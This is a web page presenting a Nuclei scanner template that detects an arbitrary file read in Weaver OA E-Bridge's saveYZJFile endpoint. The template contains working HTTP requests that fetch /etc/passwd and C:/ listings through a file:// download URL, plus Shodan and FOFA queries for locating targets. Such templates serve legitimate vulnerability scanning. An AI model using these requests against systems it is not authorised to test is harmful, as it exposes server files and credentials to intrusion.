Skip to content

Weaver E-Bidge saveYZJFile - Local File Read

ID: weaver-ebridge-lfi

Severity: high

Author: SleepingBag945

Tags: eBridge,weaver,oa,lfi,lfr,intrusive

There is an arbitrary file reading vulnerability in the Weaver OA E-Bridge saveYZJFile interface. An attacker can read any file on the server through the vulnerability.

id: weaver-ebridge-lfi
info:
name: Weaver E-Bidge saveYZJFile - Local File Read
author: SleepingBag945
severity: high
description: |
There is an arbitrary file reading vulnerability in the Weaver OA E-Bridge saveYZJFile interface. An attacker can read any file on the server through the vulnerability.
reference:
- https://peiqi.wgpsec.org/wiki/oa/%E6%B3%9B%E5%BE%AEOA/%E6%B3%9B%E5%BE%AEOA%20E-Bridge%20saveYZJFile%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E.html
metadata:
verified: true
max-request: 4
shodan-query: eBridge_JSessionid
fofa-query: app="泛微云桥e-Bridge"
tags: eBridge,weaver,oa,lfi,lfr,intrusive
http:
- raw:
- |
GET /wxjsapi/saveYZJFile?fileName=test&downloadUrl={{path}} HTTP/1.1
Host: {{Hostname}}
- |
GET /file/fileNoLogin/{{idname}} HTTP/1.1
Host: {{Hostname}}
attack: pitchfork
payloads:
path:
- file:///C:/&fileExt=txt
- file:///etc/passwd&fileExt=txt
stop-at-first-match: true
skip-variables-check: true
matchers:
- type: dsl
dsl:
- "status_code_1 == 200 && contains_all(body_1,'id', 'filepath') && !contains(tolower(body), 'status\":\"error')"
- "status_code_2 == 200 && contains(header_2, 'filename=')"
- "contains(body_2, 'Program Files') || regex('root:.*:0:0:', body)"
condition: and
extractors:
- type: regex
name: idname
internal: true
group: 1
regex:
- '"id":"(.*?)"'
# digest: 490a00463044022075ff0bc3f720aca8eba6d1f397c8ed34b590124665c48f9726ce55be5585382d02205b434292d6792583db291683e51cd11492299320e298f52ff9e39452c77511c0:922c64590222798bb761d5b6d8e72950

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/vulnerabilities/weaver/weaver-ebridge-lfi.yaml"

View on Github